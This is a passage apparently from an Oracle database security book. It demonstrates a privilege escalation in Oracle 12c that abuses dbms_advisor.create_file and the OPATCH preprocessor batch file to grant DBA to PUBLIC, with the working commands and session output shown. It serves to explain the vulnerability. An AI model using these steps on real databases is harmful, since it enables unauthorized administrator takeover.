Database Reference
In-Depth Information
ADVTEST@192.168.1.2:1522/orcl4>exec dbms_advisor.create_file('C:\app\abfb378\product\12.1.0\
dbhome_1\BIN\sqlplus / as sysdba @C:\app\abfb378\product\12.1.0\dbhome_1\QOpatch\grant.sql',
'OPATCH_SCRIPT_DIR','qopiprep.bat');
PL/SQL procedure successfully completed.
ADVTEST@192.168.1.2:1522/orcl4>select * from sys.OPATCH_XML_INV;
ERROR:
ORA-29913: error in executing ODCIEXTTABLEFETCH callout
ORA-29400: data cartridge error
KUP-04095: preprocessor command
C:\app\abfb378\product\12.1.0\dbhome_1/QOpatch\qopiprep.bat encountered error
"Error 45 initializing SQL*Plus
Internal error
"
no rows selected
But the code has actually granted DBA to public, as can be seen next:
ADVTEST@192.168.1.2:1522/orcl4>select * from user_role_privs where username='PUBLIC';
USERNAME
--------------------------------------------------------------------------------
GRANTED_ROLE
--------------------------------------------------------------------------------
ADM DEF OS_ COM
--- --- --- ---
PUBLIC
DBA
NO YES NO NO
So the ambitious user has gained DBA role, and can therefore change the SYS password.
So which users by default can take advantage of this vulnerability? One of them is DBSNMP, as shown below,
which will write an SQL script to the OS granting itself DBA, and then overwrite the pre-existing qopiprep.bat with a
command to execute that script, and then finally execute qopiprep.bat through the pre-existing external table, which
is named
sys.OPATCH_XML_INV
.
C:\app\abfb378\product\12.1.0\dbhome_1\BIN>
sqlplus dbsnmp/dbsnmp@orcl4 (CDB)
.
SQL*Plus: Release 12.1.0.1.0 Production on Sat Aug 3 02:50:52 2013
Copyright (c) 1982, 2013, Oracle. All rights reserved.
Last Successful login time: Sat Aug 03 2013 02:48:37 +01:00
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options
